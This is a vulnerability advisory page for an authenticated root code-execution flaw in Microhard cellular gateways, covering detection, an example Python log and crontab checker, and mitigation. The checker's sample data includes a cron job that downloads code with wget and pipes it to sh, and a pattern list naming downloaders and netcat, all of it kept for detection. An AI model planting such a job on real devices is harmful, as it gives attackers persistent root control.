CVE-2018-25148
Authenticated Remote Code Execution in Microhard IPn4G Admin Interface
Publication date: 2025-12-24
Last updated on: 2025-12-24
Assigner: VulnCheck
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| microhard_systems | ipn4g | 1.1.0 |
| microhard_systems | ipn3gb | 2.2.0 |
| microhard_systems | vip4gb | 1.1.6 |
| microhard_systems | dragon-lte | 1.1.0 |
| microhard_systems | bullet-3g | 1.2.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-266 | A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability affects Microhard Systems IPn4G and related 3G/4G Cellular Ethernet and Serial Gateway devices. It involves multiple authenticated remote code execution flaws in the administrative interface, where attackers who have valid credentials can exploit hidden and undocumented features to create or modify crontab jobs and system startup scripts. This allows them to execute arbitrary commands with root privileges, effectively gaining full control over the device remotely. [1, 2]
How can this vulnerability impact me?
If exploited, this vulnerability allows an attacker with authenticated access to execute arbitrary commands as the root user on the affected device. This can lead to a complete compromise of the device, including starting unauthorized services, disabling firewalls, writing files to the system, and potentially taking full control of the device and its network communications. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection has two sides: the device itself and the traffic that reaches its management interface. On the device, list the root crontab and compare it against a known-good baseline. The exact paths depend on the firmware, so check `crontab -l` as well as `/etc/crontab`, the `/etc/cron.*` directories and, because the `/cgi-bin/webif/` paths indicate an OpenWrt-based firmware with the X-Wrt `webif` administration interface, `/etc/crontabs/root`. Review the system startup scripts (for example `/etc/init.d/firewall`, the other files under `/etc/init.d/`, and `/etc/rc.local`) for commands that were not part of the shipped image. On the network side, look for POST requests to `/cgi-bin/webif/system-crontabs.sh` or `/cgi-bin/webif/system-startup.sh`: a GET to these pages is ordinary administrative browsing, but a POST is the action that creates or modifies a job or script, so every one should correspond to a change an administrator can account for. Embedded devices often keep little or no web access log, so capture this traffic at a management firewall, reverse proxy or network tap rather than relying on the device. The file name in `grep -r 'pwn.txt' /www/` is the marker used by the public proof of concept; a real attacker will pick another name, so treat any unexpected file under `/www/` as suspicious, not just that one. Useful commands: `crontab -l`, `cat /etc/crontab`, `cat /etc/crontabs/* 2>/dev/null`, `ls -la /www/`, `grep -r 'pwn.txt' /www/`, and a review of access logs for POST requests to the two CGI scripts named above. [2]
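The two checks described above, as an added example that is not part of the original page or of any vendor tooling: the first scans web access-log lines in combined log format for POST requests to the two `webif` CGI endpoints named on this page, the second compares a crontab against a baseline of known-good jobs and flags common persistence patterns. The log lines, the crontab contents, the baseline and the 198.51.100.23 address are constructed for illustration.

```python
import re

# Constructed sample access-log lines (combined log format). Only the two POSTs
# are modification attempts; the GETs are an administrator viewing the pages.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [24/Dec/2025:10:01:12 +0000] "GET /cgi-bin/webif/status.sh HTTP/1.1" 200 4211
10.0.0.5 - - [24/Dec/2025:10:02:40 +0000] "POST /cgi-bin/webif/system-crontabs.sh HTTP/1.1" 200 1180
10.0.0.9 - - [24/Dec/2025:10:03:01 +0000] "POST /cgi-bin/webif/system-startup.sh HTTP/1.1" 200 960
10.0.0.7 - - [24/Dec/2025:10:05:22 +0000] "GET /cgi-bin/webif/system-crontabs.sh HTTP/1.1" 200 2048
"""

# Endpoints this page names as the vectors for crontab / startup-script abuse.
SUSPECT_ENDPOINTS = (
    "/cgi-bin/webif/system-crontabs.sh",
    "/cgi-bin/webif/system-startup.sh",
)

# ip ident user [timestamp] "METHOD path protocol" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_requests(log_text):
    """Return (ip, timestamp, path, status) for every POST to a suspect endpoint.

    GETs are deliberately ignored: viewing the crontab page is normal admin use;
    only a POST creates or modifies a job or startup script.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        path = m.group("path").split("?", 1)[0]  # drop any query string
        if m.group("method") == "POST" and path in SUSPECT_ENDPOINTS:
            hits.append((m.group("ip"), m.group("ts"), path, int(m.group("status"))))
    return hits


# Constructed crontab as it might be pulled from the device with `crontab -l`
# or `cat /etc/crontabs/root`. 198.51.100.23 is a documentation-range address.
SAMPLE_CRONTAB = """\
# minute hour dom month dow command
0 3 * * * /sbin/logrotate_wrapper
*/5 * * * * /usr/bin/wget -q -O- http://198.51.100.23/x | sh
@reboot /tmp/.d/bd
"""

# Hypothetical baseline: the jobs present on a freshly provisioned unit.
KNOWN_GOOD_JOBS = {"0 3 * * * /sbin/logrotate_wrapper"}

# Patterns typical of persistence: downloaders, pipe-to-shell, /tmp binaries, encoded payloads.
PERSISTENCE_RE = re.compile(r"\b(wget|curl|nc|netcat|telnet)\b|\|\s*sh\b|/tmp/|\bbase64\b")


def unexpected_cron_jobs(crontab_text, baseline):
    """Return (job_line, reason) for every non-comment job not in the baseline."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line in baseline:
            continue
        reason = "not in baseline"
        if PERSISTENCE_RE.search(line):
            reason += "; downloader/pipe-to-shell/tmp-path pattern"
        findings.append((line, reason))
    return findings


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("suspicious POST:", hit)
    for job, why in unexpected_cron_jobs(SAMPLE_CRONTAB, KNOWN_GOOD_JOBS):
        print("unexpected cron job:", job, "->", why)
```

Run it against a log exported from the firewall or proxy in front of the management interface and a crontab copied off the device; every POST it reports should match a change ticket, and every cron job it reports should be explainable before the device is trusted again. The baseline must be built from a known-clean unit of the same firmware version, since jobs legitimately differ between models.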
What immediate steps should I take to mitigate this vulnerability?
Because exploitation requires valid administrator credentials, the first controls are credential hygiene and reachability: change any default passwords, use unique strong passwords for each device, remove shared or unused accounts, and apply firewall rules so that the administrative web interface is reachable only from a trusted management network or VPN and not from the cellular or other WAN-facing side. Monitor the devices for unauthorized crontab entries and startup-script modifications, and the management network for POST requests to the crontab and startup-script CGI pages, as described above. Update the firmware if the vendor has published a version that addresses these flaws; where no fix is available, disable or restrict the affected administrative web interface features. Since the hidden crontab and startup-script functions run as root, treat any device on which an unexplained job or script is found as fully compromised and rebuild it from known-good firmware rather than only deleting the entry. [1, 2]